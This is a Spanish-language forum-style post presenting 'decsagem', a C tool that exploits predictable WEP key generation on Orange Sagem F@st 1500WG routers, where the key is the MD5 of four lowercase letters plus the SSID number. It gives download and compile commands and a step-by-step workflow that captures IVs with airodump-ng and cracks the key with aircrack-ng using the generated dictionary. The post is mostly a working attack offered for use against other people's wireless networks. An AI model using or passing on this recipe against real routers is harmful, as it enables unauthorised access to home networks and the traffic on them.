Trabajo de ska1ix
Version compilada para linux : *dudux
He tenido acceso a un router Sagem F@ast 1500WG de Orange, y he visto que la clave WEP la generan a partir de un passphrase, compuesto por (por lo menos en el caso que yo he tenido entre manos) cuatro letras en minúscula más el número que aparece en el SSID. Es decir, parece que los SSID son adlsXXXX, donde XXXX son cuatro cifras, y el passphrase para generar la clave pienso que puede ser yyyyXXXX, donde yyyy son cuatro letras, supongo que en minúsculas y entre la a y la z, sin ñ ni caracteres especiales. A este passphrase le aplican el algoritmo MD5, lo que da la clave WEP en hexadecimal.
Si estoy en lo cierto, no es muy difícil reducir el campo de búsqueda de la clave, generando todas las combinaciones entre aaaaXXXX y zzzzXXXX, y aplicándole a cada posibilidad el algoritmo MD5. Por mis cálculos debería haber 26^4 posibilidades, más o menos medio millón, lo que reduce bastante el campo de búsqueda.
Bueno, pues he hecho un programilla en C, que funciona por lo menos para el caso al que tengo acceso directo, pero necesito voluntarios que verifiquen si estoy en lo cierto. El programa genera un archivo (¡17 megas!) con todas las claves posibles en formato hexadecimal y separadas cada pareja por dos puntos, para luego metérselo como diccionario al aircrack-ng.
descarga decsagem (http://www.fileden.com/files/2008/10/11/2138272/decsagem0.1.tar.gz)
Instalacion
wget http://www.wifiway.org/archivos/decsagem0.1.tar.gz
tar zxvf decsagem0.1.tar.gz
gcc md5.c decsagem.c -o decsagem
cp decsagem /usr/bin
decsagem
Sinopsis
lenny:/home/dudu/wifi# decsagem
Uso: decsagem [-i] <numeroSSID> <clave>
Autor: ska1ix compilado por *dudux
www.seguridadwireless.net
lenny:/home/dudu/wifi#
Uso Minimo 4 ivs
airodump-ng -w adsl4566 -c 9 ath0
decsagem 4566
aircrack-ng -b 00:15:56:97:43:66 -w h:claves.txt adsl4566.cap
Para generar passphrase
decsagem -i 4566 CLAVE_WEP_MAYUSCULAS_SIN_PUNTOS
+info
http://foro.elhacker.net/hacking_wireless/testers_o_informantes_para_programa_que_saca_claves_wep_para_orange-t177204.0.html
https://foro.seguridadwireless.net/index.php/topic,5210.0.html